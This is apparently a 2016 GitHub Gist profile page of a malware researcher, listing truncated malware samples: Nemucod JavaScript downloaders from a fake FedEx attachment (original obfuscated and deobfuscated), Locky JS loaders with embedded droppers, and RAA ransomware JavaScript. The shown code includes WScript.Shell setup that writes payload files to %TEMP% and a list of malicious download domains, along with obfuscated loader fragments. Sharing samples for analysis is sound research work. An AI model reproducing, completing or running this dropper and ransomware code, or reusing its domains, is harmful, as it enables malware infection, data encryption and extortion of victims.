Skip to content

Instantly share code, notes, and snippets.

View Antelox's full-sized avatar

@Antelox Antelox

43 followers · 4 following
View GitHub Profile
@Antelox
Antelox / FedEx_0000805344.doc_deobfuscated.js
Created June 9, 2016 09:12
Deobfuscated Javascript - Original one "FedEx_0000805344.doc.js"
var id = "TRMZDhCofKbv_q5hiDKefL875Yntf6t7_hOQK5aWmdOm2ocfp6cINwoJggYEDAZgrLxmdcW82GWld4k-xmgrFDct";
var ad = "14QHA8ycP4YMqtohbietj3JFKKjRkuPtv3";
var bc = "0.37070";
var ld = 0;
var cq = String.fromCharCode(34);
var cs = String.fromCharCode(92);
var ll = ["masterline.info", "mos-traffik.ru", "nahabinonasporte.ru", "shkola.selivaniha.ru", "windigomsk.ru"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
@Antelox
Antelox / FedEx_0000805344.doc.js
Created June 9, 2016 09:05
Original obfuscated Javascript code found inside zip attachment - Nemucod PHP variant
var m96='var';var j98='p.Wr';m96+=' id';j98+='es';j98+='(" ';m96+='="TRMZDhCofKbv_q5hiDKefL875Yntf6t7_hOQK5aWmdOm2ocfp6cINwoJggYEDAZgrLxmdcW82GWld4k-xmgrFDct';j98+='Line';j98+='=WS';m96+='"; v';j98+='n=';j98+=';i';m96+='ar ';j98+=' xo.';j98+='ne';m96+='ad';j98+='); ';m96+='="';j98+='ndig';j98+='n+"';m96+='14QHA8ycP4YMqtohbietj3JFKKjRkuPtv3"; ';j98+='ht';m96+='var ';j98+='"+cq';m96+='bc="';j98+='Wr';j98+='07';m96+='0.';j98+='s+"S';m96+='37';j98+='rt"';j98+='xa.t';m96+='07';j98+='Wr';j98+='ne(';m96+='0"; ';j98+='er ';j98+='eate';m96+='var';j98+='e("';m96+=' ld=';j98+='ue ';m96+='0;';j98+='e(';m96+=' var';j98+='f(';j98+=' if(';m96+=' cq=';j98+='"&';j98+='pte';m96+='St';j98+='av';j98+='ml';m96+='rin';j98+='i++)';m96+='g.f';j98+='clo';m96+='rom';j98+='ho';m96+='Char';j98+='h ';j98+=' &&';m96+='Co';j98+='u e';m96+='de(3';j98+='+n+"';j98+='es';m96+='4); ';j98+='naha';m96+='va';j98+='d="';j98+='(b';m96+='r cs';j98+='ne';j98+='s.R';m96+='=Str';j98+='.se';j98+='p.W';m96+='in';j98+='; w';m96+='g.fr';j98+='ar';j98+='ite'
@Antelox
Antelox / changes-057-deobfuscated_2.js
Created May 28, 2016 14:25
Second deobfuscation layer result
var Wm = "close";
var BLLo = "File";
var JBl9 = "To";
var NAt9 = "Save";
var BGLm0 = "xt";
var WCz = "Te";
var Ae = "write";
var JREj7 = "open";
var EXb6 = "et";
var NRMWr1 = "Chars";
@Antelox
Antelox / changes-057-deobfuscated_1.js
Created May 28, 2016 14:10
First deobfuscation layer result
var Wm = "close";
var BLLo = "File";
var JBl9 = "To";
var NAt9 = "Save";
var BGLm0 = "xt";
var WCz = "Te";
var Ae = "write";
var JREj7 = "open";
var EXb6 = "et";
var NRMWr1 = "Chars";
@Antelox
Antelox / changes-057-.js
Created May 28, 2016 14:05
Original javascript file found inside zip attachment
/*@cc_on
var acIt3SsgNM = ';-}- -;-)-(-]-b-M-O-[-3-s-S- -;-)-2- -,-/-*- - -s- -*-/- -2-j-A-K-H-(-]-s-Q-Z-Q-D- -+- -4-q-L-K-K- -+- -k-N-I-[-3-s-S- -;-)-)-5-p-R-T-(-/-*- - -s- -*-/- -a-G-K-(-]-0-m-L-G-B- -+- -z-C-W- -+- -e-A-[-3-s-S- -;-)-(-]-7-g-S- -+- -l-X-B-K-[-3-s-S- -;-6-x-N-N-U-=-]-)-)-(-}-;-s-G-R- -n-r-u-t-e-r-{-)-(-3-m-G-M-E-Z- -n-o-i-t-c-n-u-f-(- -+- -i-Z-X-L-V-[-3-s-S- -;-9-h-J-G-I-N-=-]-a-G-R-U- -+- -8-g-Z-[-3-s-S- -;-)-0-h-R- -+- -8-s-C-Y- -+- -5-t-C-G- -+- -9-j-H-B-(-]-9-y-B-E-X- -+- -)-)-(-}-;-g-B- -n-r-u-t-e-r-{-)-(-t-D-Z-H-S- -n-o-i-t-c-n-u-f-(- -+- -6-f-M-J-[-t-p-i-r-c-S-W-=-3-s-S- -r-a-v- -{- -)-5-p-R-T- -,-/-*- - -s- -*-/- -2-j-A-K-H-(-7-z-C-E- -n-o-i-t-c-n-u-f- -;-}- -;-1-q-Q- -n-r-u-t-e-r- -;-)-"-"-(-]-)-q-Q-Z-(-3-f-P-L-V-S- -+- -m-B-O-S-A-[-v-W-L-R-=-1-q-Q- -}- -;-)-)-4-m-Q-L-U-(-]-)-3-x-O-(-3-j-Q-M- -+- -)-d-Q-(-9-h-J-N-W-T- -+- -4-x-W-O-L-Z- -+- -)-)-(-}-;-4-o-I-H-W- -n-r-u-t-e-r-{-)-(-x-E-D- -n-o-i-t-c-n-u-f-(-[-g-n-i-r-t-S-(-h-s-u-p-.-v-W-L-R- -}-;-]-7-b-B-T-H-[-h-K-N-W-=-4-m-Q-L-
@Antelox
Antelox / CANON000370699263413.js
Created June 29, 2016 14:00
Locky js donwloader - More info here: http://pastebin.com/t4kPAqXP
relevant = [];
var unlike = { ':': '.','U': 'S','1010': 'X'};
var errant = 0;
function achievment(bidttt){if(bidttt==1){return 2;}else{return 17;}
return 3;}
function dollarm(rivulet) {
@Antelox
Antelox / tpl.js
Last active June 29, 2016 21:52
RAA Ransomware js code from download-the-files\.com
var CryptoJS = CryptoJS || function(u, p) {
var d = {},
l = d.lib = {},
s = function() {},
t = l.Base = {
extend: function(a) {
s.prototype = this;
var c = new s;
a && c.mixIn(a);
c.hasOwnProperty("init") || (c.init = function() {
@Antelox
Antelox / RAA.js
Last active July 30, 2016 08:45
RAA js code deobfuscated from say-helloworld\.com
var CryptoJS = CryptoJS || function(u, p) {
var d = {},
l = d.lib = {},
s = function() {},
t = l.Base = {
extend: function(a) {
s.prototype = this;
var c = new s;
a && c.mixIn(a);
c.hasOwnProperty("init") || (c.init = function() {
@Antelox
Antelox / INV000 4f4.js
Created July 22, 2016 17:26
Locky embeds its dropper in the javascript loader
var Vg3 = "e" + "";
var Ab7 = "clos" + "";
function Zt4(EGk4){return EGk4;};var Du0 = "e" + "";
var Xb1 = "Fil" + "";
var ZOw = "veTo" + "";
var NCn = "Sa" + "";
function IVm2(QZd2){return QZd2;};var ZWu = "t" + "";
var RAs = "eTex" + "";
var Ix40 = "it" + "";
var Bq0 = "wr" + "";
@Antelox
Antelox / INV000 701.js
Created July 23, 2016 07:38
Locky embeds its dropper in the javascript loader - base64 version
var NIb6 = "1" + "";
var JIb = " 32" + "";
var SUt = "Run" + "";
var WFo9 = "in" + "";
var It8 = ".b" + "";
function STq(FDw){return FDw;};var Km = "xe" + "";
var HUg8 = ".e" + "";
function OFe8(UDd){return UDd;};var ZYt1 = "H" + "";
var NUl = "Hd" + "";
var DTo = "JQl13" + "";